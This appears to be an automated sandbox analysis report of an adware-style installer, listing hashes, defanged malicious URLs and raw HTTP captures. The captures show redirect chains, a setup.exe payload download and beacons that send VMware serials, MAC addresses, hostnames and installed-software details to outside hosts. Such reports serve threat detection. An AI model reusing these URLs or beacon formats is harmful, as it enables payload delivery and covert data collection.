e47b3680df663a409ff27e7892659d6a
5094e2b5502bb3eb161183ccdd26bee5
d8616b984b03d23f2ddad2ace1e6fcc9
bb3461f9ff7218951e59c6c7d5e18f65
f6794b812107e8db90b8a9adbc3a19d6
babe8174d9e14bddc4572ed8fc3fef02
0c153ff4df276bb5694854186f48e695
Network Activity
URLs
URL | IP |
---|---|
hxxp://52.222.174.245/get.php?ses=429155916441231936 | |
hxxp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.246.201.113 |
hxxp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://d2adi7hu49xk5t.cloudfront.net/appImg.jpg | 52.222.174.190 |
hxxp://d2adi7hu49xk5t.cloudfront.net/normal_bg.jpg | 52.222.174.190 |
hxxp://ee.ilentialnessme.bid/report.php?typ=sys&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&transId=135176390&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.44531263149565414 | 54.88.21.193 |
hxxp://ee.ilentialnessme.bid/report.php?typ=conversion&transId=135176390&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&s1=117&s2=151377&s3=&s4=&s5=1399165537&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.3799597195784592 | 54.88.21.193 |
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=setup&name=Installation | |
hxxp://gurusetman.info/taveara?q=setup | 104.18.40.31 |
hxxp://greates.info/?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr | 104.27.151.43 |
hxxp://oblo.raidedsentry.ru/0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye | |
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | |
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php | |
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html | 52.222.174.240 |
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css | 52.222.174.240 |
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon1-green.png | 52.222.174.240 |
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon2-green.png | 52.222.174.240 |
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon3-green.png | 52.222.174.240 |
hxxp://n135adserv.com/js/show_ads_supp.js?pubId=907 | |
hxxp://ic-dc.deliverydlcenter.com/favicon.ico | 52.222.174.240 |
hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://www.1-1ads.com/js/show_ads_supp.js?pubId=907 | 212.124.124.178 |
hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://away.yosauruslega.bid/get.php?ses=429155916441231936 | |
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | 107.20.147.93 |
hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://wet.sodcattilyrem.bid/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=setup&name=Installation | 52.222.174.135 |
hxxp://www.selfdislikedfarfet.site/index.php | 107.20.147.93 |
hxxp://win.ketydesmidiana.bidhxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.246.201.113 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css HTTP/1.1
Accept: text/css
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 1967
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT
ETag: "92657668b4257695bd2699a787aee60b"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64444
X-Cache: Hit from cloudfront
Via: 1.1 e7ce333c56f455a0dae7f1f5ea5d6086.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fhHJWlc0aTPvIif0TAxqMwP162bjl_kkLruNbHh_EQJHE-Lfs25efg==
body{...margin: 0;...padding: 0;...font-family: Helvetica, Arial, sans-serif;..}..h1{...margin: 0;...font-size: 28px;...font-weight: normal;...text-align: center;...color: #333;..}...container{...margin: 0 auto;...width: 980px;...padding-left: 20px;...padding-right: 20px;..}...header h1.typ{...line-height: 80px;...padding-top: 0;..}...header h1{...padding-top: 13px;..}...header h1 span{...display: block;...font-size: 14px;..}...header-top, .header-bottom{...position: relative;...height: 80px;...width: 100%;..}...header-top.green{...background: #22B573;..}...header-top.blue{...background: #0461C9;..}...header-bottom.grey{...background: #CCCCCC;..}...header-bottom.light-blue{...background: #B6D2F2;...border-bottom:1px solid #02294C;..}..#widget{...margin: 0 auto;...margin-top: 50px;...margin-bottom: 150px;..}...footer{...position: relative;...width: 100%;...height: 216px;...background: #e5e5e5;...border-top: 1px solid #fff;...-webkit-box-sizing: border-box;...-moz-box-sizing: border-box;...box-sizing: border-box;..}...footer:before{...position: absolute;...left: 0;...right: 0;...top: -2px;...height: 1px;...width: 100%;...content: '';.....}...footer.green:before{...background: #0F4C2E;..}...footer.blue:before{...background: #02294C;..}...footer h3{...margin-top: 38px;...margin-bottom: 28px;...font-size: 18px;...text-align: center;...text-shadow: -1px 1px 0 #fff;..}...footer h3.green{...color: #22B573;..}...footer h3.blue{...color: #0461C9;..}..ul.steps{...margin: 0;...padding: 0;...list-style-type: none;..}..ul.st
<<< skipped >>>
GET /?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: greates.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2016 05:19:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d173566d0828d0aa2e2d9476f9244ccef1479014359; expires=Mon, 13-Nov-17 05:19:19 GMT; path=/; domain=.greates.info; HttpOnly
X-Powered-By: PHP/5.4.16
Location: hXXp://oblo.raidedsentry.ru/0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye
Server: cloudflare-nginx
CF-RAY: 300fc4a1f37f2902-OTP
0..HTTP/1.1 302 Moved Temporarily..Date: Sun, 13 Nov 2016 05:19:19 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d173566d0828d0aa2e2d9476f9244ccef1479014359; expires=Mon, 13-Nov-17 05:19:19 GMT; path=/; domain=.greates.info; HttpOnly..X-Powered-By: PHP/5.4.16..Location: hXXp://oblo.raidedsentry.ru/0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye..Server: cloudflare-nginx..CF-RAY: 300fc4a1f37f2902-OTP..0..
<<< skipped >>>
POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.selfdislikedfarfet.site
Content-Length: 523
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__2140_il2.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=Setup__2140_il2&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDA1MDU2MzNCNTUxMDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1479014369&ver=1.1.5.26
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 13 Nov 2016 05:19:30 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
37c1....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> . <title>DownloadManagerModern</title>...<script type="text/javascript">... var g_notCompatibleWithUpdaterComps = ['LootFindKP'];... var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];...</script> . <base href="hXXp://VVV.selfdislikedfarfet.site:80/index.php" />.<link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" /> <script type="text/javascript" src="hXXp://cdn1.leadingdownload.com/V38/amipb.js"></script>. <script type="text/javascript">.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.png";..var g_r_appname="installer";..var g_r_cmdline="\/S";.. var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';. var g_finish_install_button = '1';. var g_popup_install_all = '1';. var g_eula = 'VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3R
<<< skipped >>>
GET /0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: oblo.raidedsentry.ru
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sun, 13 Nov 2016 05:19:19 GMT
Content-Type: application/exe; charset=windows-1251
Content-Length: 4758720
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2016 05:19:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="setup.exe"
Content-Transfer-Encoding: binary
Pragma: public
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................$..f$.......$......0$...@...........................I.......H..........@............................1..7...P4..v...........|H.. ...@2..............................02.....................................................CODE....T.$.......$................. ..`DATA.........0$.......$.............@...BSS...........0.......0..................idata...7....1..8....0.............@....tls....0.... 2.......0..................rdata.......02.......0.............@..P.reloc.......@2.......0.............@..P.rsrc....v...P4..x....3.............@..P..............>......0=.............@..P..................................................................................................................................................................@...Boolean...........@..False.True.@.,.@...WideChar..........D.@...Char..........X.@...Smallint..........p.@...Integer.............@...Byte............@...Word............@...Cardinal............@...Int64...................@...Double..@...@...Real....@...Currency....@...ShortString...$.@...WordBool......... .@..False.True..L.@...LongBool.........H.@..False.True..t.@...String..@...WideString..@...Variant.@...@...OleVariant..@...............................@.........0E@.<E@.@E@.DE@.8E@.lB@..B@..B@..T
<<< skipped >>>
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon1-green.png HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 3392
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT
ETag: "122fe75beae30ff3ea83688e03402879"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64443
X-Cache: Hit from cloudfront
Via: 1.1 d76fac2b5a2f460a1cbffb76189f59ef.cloudfront.net (CloudFront)
X-Amz-Cf-Id: zgILzJjnODf9_u3eKN_YRJY1_4NUoxU3WshC48sfjHLWtnBwAHE_Mg==
.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[{l[W.?..g..fvR.]..2.4.z.N..?jOC......C....IS[....%Y............i].@..c.@.?Hs%.:&.....&..c.............#YIS...;.w.....cB.O......GE.l.3.n7.2Rv..FQ..JF. ...Lt.....?..m.cN...'yK...k..Y..l..........j...qO:.?.......n...8K........K7<9X.db.$.....b.............=-........<uhB..2......-/VI.Hzy.$."..?y...<.....-.iF..x.. ...N..ke....)......!._.mJc..p,a.Z.Gd.x.(...p.......j....~3.. .I..a....~4...S...NN0f.W..2.I.....t....i`..1d.6....E...^.oKGb$qm.}..;.f...g...h%x..t.K ..'.......(X...W.:...]#.p......>.._;.>j..{..V.(k.W...O\....oj..^.....K.lq>.<.......eJ........?..Yp.`.Ic........F............OV.../...n.....u.3...F..`... .....oj..b.......7"..;]i.B.. ...K.A{..W.^.g....9..?}..p....R.M....i..N.D....;......QK..,".....9.....ub>...P.....g:9/...:?.y?..a8...L....L.b.s............W...O|.S...w*...3=..J.,...:...3ok..mz....W....E.S.F.N...99K.v.S.P.......].!ey:]#C..!.8 .W...D;dq.......>;...|Y.,3D.Gq.Mg.D..i.|..X.......[.@.s8.8sVD.*cYmj.=.3..2........W...vw...fy9^.....z......pEQ. ...Q....T....#.[/..t.0z.h!..>t.....%".Bl.{.<.{.JW.....?.3h.{w...(...DF..p...dV.}X....PJ...n.A.....o. p.(..........H..3....H...N....F)p8....$.......Y....z:Tn.....W.q....6..D..G.Ud.f.....C.X....D......N..{..T.j......../."..=...g..)..<(hwX.rf...0...Z=J..=....1B..n.$U\.P.re.ku.u&8.nC.........W........so..../.O5...G.....OB#%...x...~..`.;.....^.m."...........q..S]..T.....Fj)>...|.jZ...['.....:.s.x..O.m.....[....\$0..{..&.r...^.U...?.o..Y.......ZW].
<<< skipped >>>
GET /normal_bg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 26781
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:07 GMT
ETag: "b5b0ebe137c0293f816eaac3de2b4e51"
Accept-Ranges: bytes
Server: AmazonS3
Age: 39984
X-Cache: Hit from cloudfront
Via: 1.1 8d84df16ba20ff1d2ca3914948494e04.cloudfront.net (CloudFront)
X-Amz-Cf-Id: uBkHd_5RoRqHN9as-QnlhLcpdLg65yUcQ1ooISYFQfMUoHgFEyDRww==
......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.146729, 2012/05/03-13:40:03 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows" xmpMM:InstanceID="xmp.iid:889F23E5F49B11E4A1FBA1E3C36AE7EE" xmpMM:DocumentID="xmp.did:889F23E6F49B11E4A1FBA1E3C36AE7EE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:889F23E3F49B11E4A1FBA1E3C36AE7EE" stRef:documentID="xmp.did:889F23E4F49B11E4A1FBA1E3C36AE7EE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...................................................................................................................................................E....................................................................................!.1AQa...q.....2R..u.7...."...U..B.....5.b..%4Tte'r.E..#$D......................!1."AQ2.a..BR.q...b.#3.....r......S......C.............?....j9...n..OK....xr...8..q.C..o..k.k..L[3...v....z.zqNi(...T..#.mJ..TU.....SYi.U.-[NJ9..e.IU.;.k.KY...Rm..{.....K...M..D.b...E.;.k.K[..#&.kG.....F..........k~p., ....J. .0...K-7.(..m..2q...1.}.V.1l...U........E.....*..5..fi.Oe.{...
<<< skipped >>>
GET /appImg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 4628
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:06 GMT
ETag: "ba6c4124ad5d33528fe1d609e6ac1ff0"
Accept-Ranges: bytes
Server: AmazonS3
Age: 39984
X-Cache: Hit from cloudfront
Via: 1.1 bd3e2233bf25337a89461c638cad13b9.cloudfront.net (CloudFront)
X-Amz-Cf-Id: U-EUqNxZUN-BrxOxbK_UDEar3VnABPkQfmkMdNlTHZNm6Mm0Ye_qvA==
......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.146729, 2012/05/03-13:40:03 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows" xmpMM:InstanceID="xmp.iid:E39F75D6F49A11E4B7DAEACD8AA72C6E" xmpMM:DocumentID="xmp.did:E39F75D7F49A11E4B7DAEACD8AA72C6E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E39F75D4F49A11E4B7DAEACD8AA72C6E" stRef:documentID="xmp.did:E39F75D5F49A11E4B7DAEACD8AA72C6E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................K.G........................................................................................!..1AQa.."R.T.q24D.%...B#dEU'.bSc.5u&C$t.67(.....................!1AQa..."2BR.q...b....rS.......#............?.<fnfHr.B..v.......ddD.P.Q5.(.(t.....%.KH....,...@L..f.|?..4G.....[......b.......).4_....=.<.....o.....}....6..3D....w........u.{..e.(...yN..f..sr......}...G.o......G\...-TBL.<fex.=.;...u.;..vO6..}.:p...^"x...G.s...k.=....../.t....xg.4O..^..e..z
<<< skipped >>>
GET hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: win.ketydesmidiana.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 13 Nov 2016 05:19:07 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02854-1022cfb36461ebc8195bc69760cdf1-2291-4-0-0-0-0-UA-0-32313830-30-30-_-_-30-194.242.96.226-20161113001907-_-7A6E6C272A16063B3C1716017461103D5562581C522C06645C4244007D0960733C7E091640616B0D16; expires=Tue, 13 Dec 2016 05:19:07 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Tue, 08 Oct 2019 15:59:07 GMT; path=/;
tracking_id: 1022cfb36461ebc8195bc69760cdf1
X-Robots-Tag: noindex, nofollow
Content-Length: 453
Connection: Close
